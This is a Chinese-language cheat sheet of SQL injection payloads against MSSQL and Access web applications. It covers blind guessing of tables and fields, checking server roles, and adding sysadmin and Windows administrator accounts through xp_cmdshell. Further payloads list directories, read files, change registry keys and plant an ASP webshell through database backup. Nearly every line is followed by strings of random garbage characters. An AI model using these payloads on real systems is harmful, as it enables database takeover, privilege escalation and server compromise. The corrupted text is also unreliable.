1.判断是否有注入;and 1=1 ;and 1=2 �@P�cCi�GZ
2.初步判断是否是mssql ;and user>0 X��_70]^XL
3�DoR�E�2}
3.注入参数是字符'and [查询条件] and ''=' \].J�-�^�=
WS�I�
Xj5R
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �(�I�mp
�$
IM-`<�~(I#
5.判断数据库系统 =��w�A5P@�
R�k<%r�� k
;and (select count(*) from sysobjects)>0 mssql �DA�
LQ<iF
�9)yG.�9d1
;and (select count(*) from msysobjects)>0 access Ob(leL>o�w
bx(w���:]2
��mTE�VF�m
�=&0U`�P$`
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �_@ �i�>s,
��AQci,j"�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 o?�!uX|�Fy
0M�pS4tW0=
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 K��ZK,w#9.
s[��-]cHQ
9.(1)猜字段的ascii值(access) ]A!.9Ko}�u
xYR#%�!�M�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 vbn>�m�g5
�.k��]#XoE
(2)猜字段的ascii值(mssql) z/vD�gH!s�
dB`b9)Tk0z
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �Y�MAQ+A�!
^"tqdeC�b=
10.测试权限结构(mssql) I���>((o�`
g���Na#�|
&N{zkM�f��
%\y�K5�V5�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �0�QR. ��
�Jn,w)El�s
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ~.Q4�c*_b
h3h8lt_�|�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- P{���lh)m>
�nO@�+s
�F
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- kukai�m>K�
ALR�:MAXwC
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- .!�j#3J..u
�p}8ratm�N
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- &�HxT41pku
WLy7'3���@
;and 1=(select IS_MEMBER('db_owner'));-- ^I./L)0=�}
X �RRJ�)}P
K.�h]JD�]o
Fd"Wl�BYy0
11.添加mssql和系统的帐户 f%�1wMOz�x
J3\�)�Jy��
;exec master.dbo.sp_addlogin username;-- �G�I4oQ�cJ
;exec master.dbo.sp_password null,username,password;-- 0=,'{Vz�}A
&enlAV'#)O
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- s=\7)n=,M�
*eoq=�,�O�
;exec master.dbo.xp_cmdshell 'net user username password mCrU�//�G�
�{�Pvr??"r
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �QX�/��]gX
3YR�B�I|XO
;exec master.dbo.xp_cmdshell 'net user username password /add';-- vz�,�LF=s2
P�6�E1^�$e
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ok=40B�99T
={xqN�RVd
'5cZzC��
2
Yl�B["@\[B
12.(1)遍历目录 5@.z�z"o.`
�mdt
?:F4Q
;create table dirs(paths varchar(100), id int) >%i9��oI<)
Dtt\~m�;AR
;insert dirs exec master.dbo.xp_dirtree 'c:\' j@�V�$Mbv�
$Q,�n�+ /
;and (select top 1 paths from dirs)>0 n%�U9i�wJ.
�UNY@�w=]<
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) I~'gK8<e7�
*�p"O*��zj
_�6J<YQ�K�
:�b,o B==%
(2)遍历目录 [Z��% l��.
<mn-�=�#)�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- |N6m��TB2�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �Qq>ElQ@�
p1uN�]T7>�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 =��jBL'|k5
�~W�/}:�;
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 AYYR�xhv_,
.^�GFy�� �
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 <M��`-`v6H
�1+FYjh!2t
@�p�"�NJx"
w�=gQ�3j#s
13.mssql中的存储过程 U!�_sh��<
7�~lB�}$L
xp_regenumvalues 注册表根键, 子键 6�e&g$�R
v
Rgs3A)[`d/
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 yvS^2+jW�
s/\XH&KR3V
xp_regread 根键,子键,键值名 ~"R�Q�!�&U
�qY#� m*R
;exec xp_regread R�$�v i!�0
_=�)!x�nYf
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 TLX^~W[gOm
7:��ckq(89
xp_regwrite 根键,子键, 值名, 值类型, 值 v7��g�
[Lk
I_K[�!4~Kn
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ��fyGCfM�
t0+t9w/fTP
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 @]����,Z 2
`2sd�Z/f�O
xp_regdeletevalue 根键,子键,值名 }3�Df��]��
jf2y0W�>6s
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 '>���"�`)-
^CO#QnB @�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 kaV%0O�f]�
}t}38%1��i
MyK^i�2eD�
-Zt�tj��/K
14.mssql的backup创建webshell %{=4Fa(Jux
b,z�R5R^D;
use model h#�v��L5At
ZyZl�\\8U�
create table cmd(str image); ���KhLg*EL
s�}X�i2�^x
insert into cmd(str) values (''); a\�.�//�?
�@ 8�A{ 9i
backup database model to disk='c:\l.asp'; Hu[��8HzJo
r
��.{r�NR
u;$I{b@M�]
e�1:u1(".�
15.mssql内置函数 v4X_v!��CQ
�_QD/�!�~O
;and (select @@version)>0 获得Windows的版本号 yIM.j;5:~5
y��l[2�et
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �b�;�SFI^
YL;��SxLY�
;and (select user_name())>0 爆当前系统的连接用户 axHxqhO7zp
�7 �_X&5ni
;and (select db_name())>0 得到当前连接的数据库 #t�CIu�Q,�
4+B��rTG�p
��C+�}�CU}
��zUvB0\{q
16.简洁的webshell i%�#th'C!P
;:�-}z.7Y�
use model hQ\��#Fhu7
-Mit$�mF�n
create table cmd(str image); r[�Z���g 2
7)g�;Wd+�H
insert into cmd(str) values (''); Iwnj'R7�:�
`#-�p,NElV
backup database model to disk='g:\wwwtest\l.asp';
